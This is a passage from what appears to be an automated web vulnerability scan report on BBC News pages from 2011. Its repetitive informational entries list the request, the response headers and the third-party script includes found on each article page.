GET /news/magazine-12392811 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:47 GMT
Keep-Alive: timeout=10, max=789
Expires: Sat, 12 Feb 2011 02:02:47 GMT
Connection: close
Set-Cookie: BBC-UID=24cd05b55eda44a73e6f2966d140b7f0bc3e37f1306021ca449b2a851191ca7e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:47 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=24cd05b55eda44a73e6f2966d140b7f0bc3e37f1306021ca449b2a851191ca7e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:47 GMT; path=/; domain=bbc.co.uk;
Content-Length: 83284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.3//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.13. http://www.bbc.co.uk/news/magazine-12418046  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12418046

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/magazine-12418046 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:47 GMT
Keep-Alive: timeout=10, max=636
Expires: Sat, 12 Feb 2011 02:02:47 GMT
Connection: close
Set-Cookie: BBC-UID=448d5535deda7427a994e811e1a37284235a5811d0f0e10f7209804cd6c077c60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:47 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=448d5535deda7427a994e811e1a37284235a5811d0f0e10f7209804cd6c077c60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:47 GMT; path=/; domain=bbc.co.uk;
Content-Length: 80543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.14. http://www.bbc.co.uk/news/magazine-12428754  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12428754

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/magazine-12428754 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:48 GMT
Keep-Alive: timeout=10, max=773
Expires: Sat, 12 Feb 2011 02:02:48 GMT
Connection: close
Set-Cookie: BBC-UID=e48d85556efa14285a62d62d81a0ce5c90ffe57e109041491bbb638ef80de38a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:48 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=e48d85556efa14285a62d62d81a0ce5c90ffe57e109041491bbb638ef80de38a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:48 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.15. http://www.bbc.co.uk/news/magazine-12428759  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12428759

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/magazine-12428759 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:49 GMT
Keep-Alive: timeout=10, max=797
Expires: Sat, 12 Feb 2011 02:02:49 GMT
Connection: close
Set-Cookie: BBC-UID=141de5157e9a84891910cc2e513ceec8dc55828370903159cb7b13cf5844c6dc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:49 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=141de5157e9a84891910cc2e513ceec8dc55828370903159cb7b13cf5844c6dc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:49 GMT; path=/; domain=bbc.co.uk;
Content-Length: 101213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.16. http://www.bbc.co.uk/news/science-environment-12412662  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-12412662

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/science-environment-12412662 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:50 GMT
Keep-Alive: timeout=10, max=754
Expires: Sat, 12 Feb 2011 02:02:50 GMT
Connection: close
Set-Cookie: BBC-UID=347dd5b5ce2a340ae7f18f05e125b582721989735070e1da843b3ad564517cdc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:50 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=347dd5b5ce2a340ae7f18f05e125b582721989735070e1da843b3ad564517cdc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:50 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.17. http://www.bbc.co.uk/news/science-environment-12417858  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-12417858

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/science-environment-12417858 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:51 GMT
Keep-Alive: timeout=10, max=798
Expires: Sat, 12 Feb 2011 02:02:51 GMT
Connection: close
Set-Cookie: BBC-UID=948d15f55e4af4cbc9506d9791a9dbd248e5cac4c020a1c93b8b637f88c4864c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:51 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=948d15f55e4af4cbc9506d9791a9dbd248e5cac4c020a1c93b8b637f88c4864c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:51 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.18. http://www.bbc.co.uk/news/science-environment-12424620  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-12424620

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/science-environment-12424620 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:51 GMT
Keep-Alive: timeout=10, max=742
Expires: Sat, 12 Feb 2011 02:02:51 GMT
Connection: close
Set-Cookie: BBC-UID=24bd35052e5ae45b586d3412f10916bd75e7eb6aa0400263d7fd6a702573da8e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:51 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=24bd35052e5ae45b586d3412f10916bd75e7eb6aa0400263d7fd6a702573da8e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:51 GMT; path=/; domain=bbc.co.uk;
Content-Length: 46470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.19. http://www.bbc.co.uk/news/technology-12419672  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/technology-12419672

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/technology-12419672 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:52 GMT
Keep-Alive: timeout=10, max=789
Expires: Sat, 12 Feb 2011 02:02:52 GMT
Connection: close
Set-Cookie: BBC-UID=f4adc5b54e0a54dc0a5670a631741a202a9d9cb860401179bb3b222a563c34760Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:52 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=f4adc5b54e0a54dc0a5670a631741a202a9d9cb860401179bb3b222a563c34760Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:52 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.20. http://www.bbc.co.uk/news/technology-12429808  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/technology-12429808

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/technology-12429808 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:53 GMT
Keep-Alive: timeout=10, max=773
Expires: Sat, 12 Feb 2011 02:02:53 GMT
Connection: close
Set-Cookie: BBC-UID=94dd95e52e1a548dcac1b16be17c735c87363dcf70a0a1c92b6be322574de9ce0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:53 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=94dd95e52e1a548dcac1b16be17c735c87363dcf70a0a1c92b6be322574de9ce0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:53 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55089

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.21. http://www.bbc.co.uk/news/uk-12427839  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-12427839

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/uk-12427839 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:54 GMT
Keep-Alive: timeout=10, max=800
Expires: Sat, 12 Feb 2011 02:02:54 GMT
Connection: close
Set-Cookie: BBC-UID=04cd85857e9a64ee181d5551d121862c55bfe53e20309273c7ad8af045b36a8e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:54 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=04cd85857e9a64ee181d5551d121862c55bfe53e20309273c7ad8af045b36a8e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:54 GMT; path=/; domain=bbc.co.uk;
Content-Length: 67506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.22. http://www.bbc.co.uk/news/uk-12435618  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-12435618

Issue detail

The response dynamically includes the following scripts from other domains:

Request

